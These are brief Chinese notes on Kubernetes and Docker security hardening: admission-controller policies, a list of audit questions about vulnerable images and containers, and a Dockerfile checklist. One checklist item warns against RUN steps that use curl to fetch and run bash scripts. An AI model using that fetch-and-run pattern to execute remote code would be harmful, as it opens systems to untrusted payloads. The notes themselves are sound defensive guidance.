使用PodSecurityPolicy准入控制器可以确保实施适当的管理策略。PodSecurityPolicy控制器可以阻止容器以root身份运行，或者确保容器的根文件系统以只读方式安装（这些建议听起来很耳熟，因为它们都在之前要采取的Docker措施清单中）。
使用Kubernetes准入控制器来实施映像注册表管理策略，以便自动拒绝从不受信任的注册表中获取的所有映像。

安全问题

上次扫描日期超过60天的主机上有多少张图像？
多少个图像/容器具有高严重性漏洞？
这些高度严重的易受攻击的容器会影响哪些部署？
受影响的部署中是否有任何存储秘密的容器？
是否有任何易受攻击的容器以root身份或特权标志运行？
Pod中是否有没有与之关联的网络策略（意味着它允许所有通信）的易受攻击的容器？
生产中运行的任何容器都会受到此漏洞的影响吗？
我们正在使用的图像来自哪里？
我们如何阻止从不受信任的注册表中提取的图像？
我们能够查看容器运行时正在执行哪些进程吗？
哪些集群，名称空间和节点不符合Docker和Kubernetes的CIS基准测试？

Dockerfile需要注意的问题

确保USER已经被指定
确保基本的镜像版本已经固定
确保操作系统包版本已经固定
避免使用ADD，尽量使用COPY
避免使用apt/apk upgrade
避免在RUN指令中调用curl获取bash文件

静态分析工具

k8s config扫描工具